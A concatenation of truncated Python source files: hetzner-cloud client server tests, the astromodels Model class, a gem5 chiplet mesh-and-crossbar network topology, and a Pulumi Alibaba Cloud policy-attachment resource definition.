method="POST",
json={"delete": True, "rebuild": True},
)
assert action.id == 1
assert action.progress == 0
def test_request_console(
self, hetzner_client, bound_server, response_server_request_console
):
hetzner_client.request.return_value = response_server_request_console
response = bound_server.request_console()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/request_console", method="POST"
)
assert response.action.id == 1
assert response.action.progress == 0
assert (
response.wss_url
== "wss://console.hetzner.cloud/?server_id=1&token=<PASSWORD>"
)
assert response.password == "<PASSWORD>"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_attach_to_network(
self, hetzner_client, bound_server, network, response_attach_to_network
):
hetzner_client.request.return_value = response_attach_to_network
action = bound_server.attach_to_network(
network, "10.0.1.1", ["10.0.1.2", "10.0.1.3"]
)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/attach_to_network",
method="POST",
json={
"network": 4711,
"ip": "10.0.1.1",
"alias_ips": ["10.0.1.2", "10.0.1.3"],
},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "attach_to_network"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_detach_from_network(
self, hetzner_client, bound_server, network, response_detach_from_network
):
hetzner_client.request.return_value = response_detach_from_network
action = bound_server.detach_from_network(network)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/detach_from_network",
method="POST",
json={"network": 4711},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "detach_from_network"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_change_alias_ips(
self, hetzner_client, bound_server, network, response_change_alias_ips
):
hetzner_client.request.return_value = response_change_alias_ips
action = bound_server.change_alias_ips(network, ["10.0.1.2", "10.0.1.3"])
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_alias_ips",
method="POST",
json={"network": 4711, "alias_ips": ["10.0.1.2", "10.0.1.3"]},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "change_alias_ips"
@pytest.mark.parametrize(
"placement_group",
[PlacementGroup(id=897), BoundPlacementGroup(mock.MagicMock, dict(id=897))],
)
def test_add_to_placement_group(
self,
hetzner_client,
bound_server,
placement_group,
response_add_to_placement_group,
):
hetzner_client.request.return_value = response_add_to_placement_group
action = bound_server.add_to_placement_group(placement_group)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/add_to_placement_group",
method="POST",
json={"placement_group": "897"},
)
assert action.id == 13
assert action.progress == 0
assert action.command == "add_to_placement_group"
def test_remove_from_placement_group(
self, hetzner_client, bound_server, response_remove_from_placement_group
):
hetzner_client.request.return_value = response_remove_from_placement_group
action = bound_server.remove_from_placement_group()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/remove_from_placement_group", method="POST"
)
assert action.id == 13
assert action.progress == 100
assert action.command == "remove_from_placement_group"
class TestServersClient(object):
@pytest.fixture()
def servers_client(self):
return ServersClient(client=mock.MagicMock())
def test_get_by_id(self, servers_client, response_simple_server):
servers_client._client.request.return_value = response_simple_server
bound_server = servers_client.get_by_id(1)
servers_client._client.request.assert_called_with(
url="/servers/1", method="GET"
)
assert bound_server._client is servers_client
assert bound_server.id == 1
assert bound_server.name == "my-server"
@pytest.mark.parametrize(
"params",
[
{"name": "server1", "label_selector": "label1", "page": 1, "per_page": 10},
{"name": ""},
{},
],
)
def test_get_list(self, servers_client, response_simple_servers, params):
servers_client._client.request.return_value = response_simple_servers
result = servers_client.get_list(**params)
servers_client._client.request.assert_called_with(
url="/servers", method="GET", params=params
)
bound_servers = result.servers
assert result.meta is None
assert len(bound_servers) == 2
bound_server1 = bound_servers[0]
bound_server2 = bound_servers[1]
assert bound_server1._client is servers_client
assert bound_server1.id == 1
assert bound_server1.name == "my-server"
assert bound_server2._client is servers_client
assert bound_server2.id == 2
assert bound_server2.name == "my-server2"
@pytest.mark.parametrize(
"params", [{"name": "server1", "label_selector": "label1"}, {}]
)
def test_get_all(self, servers_client, response_simple_servers, params):
servers_client._client.request.return_value = response_simple_servers
bound_servers = servers_client.get_all(**params)
params.update({"page": 1, "per_page": 50})
servers_client._client.request.assert_called_with(
| |
<filename>astromodels/core/model.py
from builtins import zip
__author__ = "giacomov"
import collections
import os
import warnings
import numpy as np
import pandas as pd
import scipy.integrate
from astromodels.core.memoization import use_astromodels_memoization
from astromodels.core.my_yaml import my_yaml
from astromodels.core.parameter import IndependentVariable, Parameter
from astromodels.core.tree import DuplicatedNode, Node
from astromodels.functions.function import get_function
from astromodels.sources.source import (EXTENDED_SOURCE, PARTICLE_SOURCE,
POINT_SOURCE, Source)
from astromodels.utils.disk_usage import disk_usage
from astromodels.utils.logging import setup_logger
from astromodels.utils.long_path_formatter import long_path_formatter
log = setup_logger(__name__)
class ModelFileExists(IOError):
pass
class InvalidInput(ValueError):
pass
class CannotWriteModel(IOError):
def __init__(self, directory, message):
# Add a report on disk usage to the message
free_space = disk_usage(directory).free
message += "\nFree space on the file system hosting %s was %.2f Mbytes" % (
directory,
free_space / 1024.0 / 1024.0,
)
super(CannotWriteModel, self).__init__(message)
class ModelInternalError(ValueError):
pass
class Model(Node):
def __init__(self, *sources):
# Setup the node, using the special name '__root__' to indicate that this is the root of the tree
super(Model, self).__init__("__root__")
# Dictionary to keep point sources
self._point_sources = collections.OrderedDict()
# Dictionary to keep extended sources
self._extended_sources = collections.OrderedDict()
# Dictionary to keep particle sources
self._particle_sources = collections.OrderedDict()
# Loop over the provided sources and process them
for source in sources:
self._add_source(source)
# Now make the list of all the existing parameters
self._update_parameters()
# This controls the verbosity of the display
self._complete_display = False
# This will keep track of independent variables (if any)
self._independent_variables = {}
def _add_source(self, source):
"""
Remember to call _update_parameters after this!
:param source:
:return:
"""
try:
self._add_child(source)
except AttributeError:
if isinstance(source, Source):
raise DuplicatedNode(
"More than one source with the name '%s'. You cannot use the same name for multiple "
"sources" % source.name
)
else: # pragma: no cover
raise
# Now see if this is a point or extended source, and add them to the
# appropriate dictionary
if source.source_type == POINT_SOURCE:
self._point_sources[source.name] = source
elif source.source_type == EXTENDED_SOURCE:
self._extended_sources[source.name] = source
elif source.source_type == PARTICLE_SOURCE:
self._particle_sources[source.name] = source
else: # pragma: no cover
raise InvalidInput(
"Input sources must be either a point source or an extended source"
)
def _remove_source(self, source_name):
"""
Remember to call _update_parameters after this
:param source_name:
:return:
"""
assert source_name in self.sources, (
"Source %s is not part of the current model" % source_name
)
source = self.sources.pop(source_name)
if source.source_type == POINT_SOURCE:
self._point_sources.pop(source.name)
elif source.source_type == EXTENDED_SOURCE:
self._extended_sources.pop(source.name)
elif source.source_type == PARTICLE_SOURCE:
self._particle_sources.pop(source.name)
self._remove_child(source_name)
def _find_parameters(self, node):
instances = collections.OrderedDict()
for child in node._get_children():
if isinstance(child, Parameter):
path = child._get_path()
instances[path] = child
for sub_child in child._get_children():
instances.update(self._find_parameters(sub_child))
else:
instances.update(self._find_parameters(child))
return instances
def _update_parameters(self):
self._parameters = self._find_parameters(self)
@property
def parameters(self):
"""
Return a dictionary with all parameters
:return: dictionary of parameters
"""
self._update_parameters()
return self._parameters
@property
def free_parameters(self):
"""
Get a dictionary with all the free parameters in this model
:return: dictionary of free parameters
"""
# Refresh the list
self._update_parameters()
# Filter selecting only free parameters
free_parameters_dictionary = collections.OrderedDict()
for parameter_name, parameter in list(self._parameters.items()):
if parameter.free:
free_parameters_dictionary[parameter_name] = parameter
return free_parameters_dictionary
@property
def linked_parameters(self):
"""
Get a dictionary with all parameters in this model in a linked status. A parameter is in a linked status
if it is linked to another parameter (i.e. it is forced to have the same value of the other parameter), or
if it is linked with another parameter or an independent variable through a law.
:return: dictionary of linked parameters
"""
# Refresh the list
self._update_parameters()
# Filter selecting only free parameters
linked_parameter_dictionary = collections.OrderedDict()
for parameter_name, parameter in list(self._parameters.items()):
if parameter.has_auxiliary_variable():
linked_parameter_dictionary[parameter_name] = parameter
return linked_parameter_dictionary
def set_free_parameters(self, values):
"""
Set the free parameters in the model to the provided values.
NOTE: of course, order matters
:param values: a list of new values
:return: None
"""
assert len(values) == len(self.free_parameters)
for parameter, this_value in zip(list(self.free_parameters.values()), values):
parameter.value = this_value
def __getitem__(self, path):
"""
Get a parameter from a path like "source_1.component.powerlaw.logK". This might be useful in certain
context, although in an interactive analysis there is no reason to use this.
:param path: the address of the parameter
:return: the parameter
"""
return self._get_child_from_path(path)
def __contains__(self, path):
"""
This allows the model to be used with the "in" operator, like;
> if 'myparameter' in model:
> print("Myparameter is contained in the model")
:param path: the parameter to look for
:return:
"""
try:
_ = self._get_child_from_path(path)
except (AttributeError, KeyError, TypeError):
return False
else:
return True
def __iter__(self):
"""
This allows the model to be iterated on, like in:
for parameter in model:
...
NOTE: this will iterate over *all* parameters in the model, also those that are not free (and thus are not
normally displayed). If you need to operate only on free parameters, just check if they are free within
the loop or use the .free_parameters dictionary directly
:return: iterator
"""
for parameter in self.parameters:
yield self.parameters[parameter]
@property
def point_sources(self):
"""
Returns the dictionary of all defined point sources
:return: collections.OrderedDict()
"""
return self._point_sources
@property
def extended_sources(self):
"""
Returns the dictionary of all defined extended sources
:return: collections.OrderedDict()
"""
return self._extended_sources
@property
def particle_sources(self):
"""
Returns the dictionary of all defined particle sources
:return: collections.OrderedDict()
"""
return self._particle_sources
@property
def sources(self):
"""
Returns a dictionary containing all defined sources (of any kind)
:return: collections.OrderedDict()
"""
sources = collections.OrderedDict()
for d in (self.point_sources, self.extended_sources, self.particle_sources):
sources.update(d)
return sources
def add_source(self, new_source):
"""
Add the provided source to the model
:param new_source: the new source to be added (an instance of PointSource, ExtendedSource or ParticleSource)
:return: (none)
"""
self._add_source(new_source)
self._update_parameters()
def remove_source(self, source_name):
"""
Returns a new model with the provided source removed from the current model. Any parameters linked to the source to be removed are automatically unlinked.
:param source_name: the name of the source to be removed
:return: a new Model instance without the source
"""
self.unlink_all_from_source(source_name, warn=True)
self._remove_source(source_name)
self._update_parameters()
def unlink_all_from_source(self, source_name, warn=False):
"""
Unlink all parameters of the current model that are linked to a parameter of a given source.
To be called before removing a source from the model.
:param source_name: the name of the source to which to remove all links
:param warn: If True, prints a warning if any parameters were unlinked.
"""
tempmodel = Model(self[source_name])
unlinked_parameters = collections.OrderedDict()
for par in self.linked_parameters.values():
target=par._aux_variable['variable']
if target.path in tempmodel:
unlinked_parameters[par.name] = par
self.unlink(par)
if warn and unlinked_parameters:
warnings.warn("The following %d parameters that were linked to source %s have been automatically un-linked: %s" %
(len(unlinked_parameters), source_name, [p.path for p in unlinked_parameters.values() ] ),
RuntimeWarning)
def add_independent_variable(self, variable):
"""
Add a global independent variable to this model, such as time.
:param variable: an IndependentVariable instance
:return: none
"""
assert isinstance(
variable, IndependentVariable
), "Variable must be an instance of IndependentVariable"
if self._has_child(variable.name):
self._remove_child(variable.name)
self._add_child(variable)
# Add also to the list of independent variables
self._independent_variables[variable.name] = variable
def remove_independent_variable(self, variable_name):
"""
Remove an independent variable which was added with add_independent_variable
:param variable_name: name of variable to remove
:return:
"""
self._remove_child(variable_name)
# Remove also from the list of independent variables
self._independent_variables.pop(variable_name)
def add_external_parameter(self, parameter):
"""
Add a parameter that comes from something other than a function, to the model.
:param parameter: a Parameter instance
:return: none
"""
assert isinstance(
parameter, Parameter
), "Variable must be an instance of IndependentVariable"
if self._has_child(parameter.name):
# Remove it from the children only if it is a Parameter instance, otherwise don't, which will
# make the _add_child call fail (which is the expected behaviour! You shouldn't call two children
# with the same name)
if isinstance(self._get_child(parameter.name), Parameter):
log.warning(
"External parameter %s already exist in the model. Overwriting it..."
% parameter.name
)
self._remove_child(parameter.name)
# This will fail if another node with the same name is already in the model
self._add_child(parameter)
def remove_external_parameter(self, parameter_name):
"""
Remove an external parameter which was added with add_external_parameter
:param variable_name: name of parameter to remove
:return:
"""
self._remove_child(parameter_name)
def link(self, parameter_1, parameter_2, link_function=None):
"""
Link the value of the provided parameters through the provided function (identity is the default, i.e.,
parameter_1 = parameter_2).
:param | |
<filename>configs/topologies/CHIPS_Multicore_GTRocketN.py
# Copyright (c) 2018 Georgia Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: <NAME>
from m5.params import *
from m5.objects import *
from BaseTopology import SimpleTopology
import math
# Creates a Hierarchical Mesh Topology.
# If there are k^k CPUs, then k clusters, each with (sqrt k) CPUs are created.
# One L1 is connected to each CPU.
# Each cluster uses a Mesh NoC.
# XY routing is enforced (using link weights) to guarantee deadlock freedom.
# The k CPU clusters, k L2s and 4 Memory controllers are all
# connected as separate chiplets via a crossbar.
class CHIPS_Multicore_GTRocketN(SimpleTopology):
description='CHIPS_Multicore_GTRocketN'
def __init__(self, controllers):
self.nodes = controllers
def makeTopology(self, options, network, IntLink, ExtLink, Router):
# Default values for link latency and router latency.
# Can be over-ridden on a per link/router basis
chiplet_link_latency = options.chiplet_link_latency
chiplet_link_width = options.chiplet_link_width
interp_link_latency = options.interposer_link_latency
interp_link_width = options.interposer_link_width
router_latency = options.router_latency
nodes = self.nodes
# First determine which nodes are cache cntrls vs. dirs vs. dma
cpu_nodes = []
l2_nodes = []
mc_nodes = []
dma_nodes = []
for node in nodes:
if node.type == 'L1Cache_Controller':
cpu_nodes.append(node)
elif node.type == 'L2Cache_Controller':
l2_nodes.append(node)
elif node.type == 'Directory_Controller':
mc_nodes.append(node)
elif node.type == 'DMA_Controller':
dma_nodes.append(node)
# Compute the configuration:
num_cpu_chiplets = int(math.sqrt(len(cpu_nodes)))
num_cpus_per_chiplet = int(len(cpu_nodes) / num_cpu_chiplets)
num_l2_mc_dma_chiplets = len(l2_nodes) + len(mc_nodes) + len(dma_nodes)
num_chiplets = num_cpu_chiplets + num_l2_mc_dma_chiplets + 1 #(xbar)
# Mesh rows and columns
num_rows = int(math.sqrt(num_cpus_per_chiplet))
num_columns = int(num_cpus_per_chiplet / num_rows)
assert((num_rows*num_columns*num_cpu_chiplets) == options.num_cpus)
num_routers = len(cpu_nodes) + len(l2_nodes) \
+ len(mc_nodes) + len(dma_nodes) \
+ 1 # (for xbar)
# Print configuration
print "Configuration:\nNum CPU Chiplets = " + str(num_cpu_chiplets) + \
"\nNum L2 Chiplets = " + str(len(l2_nodes)) + \
"\nNum MC Chiplets = " + str(len(mc_nodes)) + \
"\nNum DMA Chiplets = " + str(len(dma_nodes)) + \
"\nCPU Chiplet Configuration: " + str(num_rows) + " x " + \
str(num_columns) + " Mesh"
# Create the routers
routers = [Router(router_id=i, latency = router_latency) \
for i in range(num_routers)]
network.routers = routers
# link counter to set unique link ids
link_count = 0
# start from router 0
router_id = 0
# Connect each CPU to a unique router
ext_links = []
for (i, n) in enumerate(cpu_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("CPU", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
l2c_router_start_id = router_id
# Connect each L2 to a router
for (i, n) in enumerate(l2_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("L2", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
mcc_router_start_id = router_id
# Connect the MC nodes to routers
for (i, n) in enumerate(mc_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("MC", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
dmac_router_start_id = router_id
# Connect the DMA nodes to routers
for (i, n) in enumerate(dma_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("DMA", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
network.ext_links = ext_links
## All routers except xbar have been connected
assert(router_id == num_routers - 1)
xbar_id = router_id # This is the last remaining router
routers[xbar_id].latency=4 # Assume 4-cycle high-radix xbar
# Create the mesh links inside each chiplet
int_links = []
test_num_cpus = 0
for cc in xrange(num_cpu_chiplets):
print "Topology for CPU Chiplet " + str(cc) + ":"
# East output to West input links (weight = 1)
for row in xrange(num_rows):
for col in xrange(num_columns):
test_num_cpus += 1
if (col + 1 < num_columns):
east_out = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
west_in = (cc*num_cpus_per_chiplet) + (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[east_out],
dst_node=routers[west_in],
src_outport="East",
dst_inport="West",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=1))
print_connection("Router", get_router_id(routers[east_out]),
"Router", get_router_id(routers[west_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# West output to East input links (weight = 1)
for row in xrange(num_rows):
for col in xrange(num_columns):
if (col + 1 < num_columns):
east_in = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
west_out = (cc*num_cpus_per_chiplet) + (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[west_out],
dst_node=routers[east_in],
src_outport="West",
dst_inport="East",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=1))
print_connection("Router", get_router_id(routers[west_out]),
"Router", get_router_id(routers[east_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# North output to South input links (weight = 2)
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_out = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
south_in = (cc*num_cpus_per_chiplet) + col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[north_out],
dst_node=routers[south_in],
src_outport="North",
dst_inport="South",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=2))
print_connection("Router", get_router_id(routers[north_out]),
"Router", get_router_id(routers[south_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# South output to North input links (weight = 2)
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_in = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
south_out = (cc*num_cpus_per_chiplet) + col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[south_out],
dst_node=routers[north_in],
src_outport="South",
dst_inport="North",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=2))
print_connection("Router", get_router_id(routers[south_out]),
"Router", get_router_id(routers[north_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
## Added all CPU chiplet links
assert(test_num_cpus == len(cpu_nodes))
## Connect all chiplets to Xbar
print "Connecting all Chiplets to Xbar Chiplet:"
# First connect all CPU chiplets via their Router "0"
cc_router_id = 0
for cc in xrange(num_cpu_chiplets):
# CPU Chiplet to Rtr
int_links.append(IntLink(link_id=link_count,
src_node=routers[cc_router_id],
dst_node=routers[xbar_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[cc_router_id]),
"Router", get_router_id(routers[xbar_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
# Rtr to CPU chiplet
int_links.append(IntLink(link_id=link_count,
src_node=routers[xbar_id],
dst_node=routers[cc_router_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[xbar_id]),
"Router", get_router_id(routers[cc_router_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
cc_router_id += num_cpus_per_chiplet
# Next, connect all other chiplets to xbar
# Router id of first L2 chiplet should be same as num_cpus
assert(l2c_router_start_id == len(cpu_nodes))
ncc_router_id = l2c_router_start_id
# Chiplet to Xbar
for ncc in xrange(num_l2_mc_dma_chiplets):
int_links.append(IntLink(link_id=link_count,
src_node=routers[ncc_router_id],
dst_node=routers[xbar_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[ncc_router_id]),
"Router", get_router_id(routers[xbar_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
# Xbar to chiplet
int_links.append(IntLink(link_id=link_count,
src_node=routers[xbar_id],
dst_node=routers[ncc_router_id],
latency = interp_link_latency,
width = interp_link_width,
tx_clip = True,
rx_clip = True,
weight=1))
print_connection("Router", get_router_id(routers[xbar_id]),
"Router", get_router_id(routers[ncc_router_id]),
link_count,
interp_link_latency, interp_link_width)
link_count += 1
ncc_router_id += 1
# At the end ncc_router_id should be same as last chiplet, namely xbar
assert(ncc_router_id == | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['PolicyAttachmentArgs', 'PolicyAttachment']
@pulumi.input_type
class PolicyAttachmentArgs:
def __init__(__self__, *,
policy_name: pulumi.Input[str],
policy_type: pulumi.Input[str],
principal_name: pulumi.Input[str],
principal_type: pulumi.Input[str],
resource_group_id: pulumi.Input[str]):
"""
The set of arguments for constructing a PolicyAttachment resource.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "policy_type", policy_type)
pulumi.set(__self__, "principal_name", principal_name)
pulumi.set(__self__, "principal_type", principal_type)
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Input[str]:
"""
- (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
"""
return pulumi.get(self, "policy_type")
@policy_type.setter
def policy_type(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_type", value)
@property
@pulumi.getter(name="principalName")
def principal_name(self) -> pulumi.Input[str]:
"""
The name of the object to which you want to attach the policy.
"""
return pulumi.get(self, "principal_name")
@principal_name.setter
def principal_name(self, value: pulumi.Input[str]):
pulumi.set(self, "principal_name", value)
@property
@pulumi.getter(name="principalType")
def principal_type(self) -> pulumi.Input[str]:
"""
The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
"""
return pulumi.get(self, "principal_type")
@principal_type.setter
def principal_type(self, value: pulumi.Input[str]):
pulumi.set(self, "principal_type", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Input[str]:
"""
The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_id", value)
@pulumi.input_type
class _PolicyAttachmentState:
def __init__(__self__, *,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PolicyAttachment resources.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
:param pulumi.Input[str] resource_group_id: The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
if policy_name is not None:
pulumi.set(__self__, "policy_name", policy_name)
if policy_type is not None:
pulumi.set(__self__, "policy_type", policy_type)
if principal_name is not None:
pulumi.set(__self__, "principal_name", principal_name)
if principal_type is not None:
pulumi.set(__self__, "principal_type", principal_type)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> Optional[pulumi.Input[str]]:
"""
- (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
"""
return pulumi.get(self, "policy_type")
@policy_type.setter
def policy_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_type", value)
@property
@pulumi.getter(name="principalName")
def principal_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the object to which you want to attach the policy.
"""
return pulumi.get(self, "principal_name")
@principal_name.setter
def principal_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_name", value)
@property
@pulumi.getter(name="principalType")
def principal_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
"""
return pulumi.get(self, "principal_type")
@principal_type.setter
def principal_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_type", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group or the ID of the Alibaba Cloud account to which the resource group belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
class PolicyAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
policy_name: Optional[pulumi.Input[str]] = None,
policy_type: Optional[pulumi.Input[str]] = None,
principal_name: Optional[pulumi.Input[str]] = None,
principal_type: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Resource Manager Policy Attachment resource to attaches a policy to an object. After you attach a policy to an object, the object has the operation permissions on the current resource group or the resources under the current account.
For information about Resource Manager Policy Attachment and how to use it, see [How to authorize and manage resource groups](https://www.alibabacloud.com/help/en/doc-detail/94490.htm).
> **NOTE:** Available in v1.93.0+.
## Import
Resource Manager Policy Attachment can be imported using the id, e.g.
```sh
$ pulumi import alicloud:resourcemanager/policyAttachment:PolicyAttachment example tf-testaccrdpolicy:Custom:tf-testaccrdpolicy@11827252********.onaliyun.com:IMSUser:rg******
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] policy_name: The name of the policy. name must be 1 to 128 characters in length and can contain letters, digits, and hyphens (-).
:param pulumi.Input[str] policy_type: - (Required, ForceNew) The type of the policy. Valid values: `Custom`, `System`.
:param pulumi.Input[str] principal_name: The name of the object to which you want to attach the policy.
:param pulumi.Input[str] principal_type: The type of the object to which you want to attach the policy. Valid values: `IMSUser`: RAM user, `IMSGroup`: RAM user group, `ServiceRole`: RAM role.
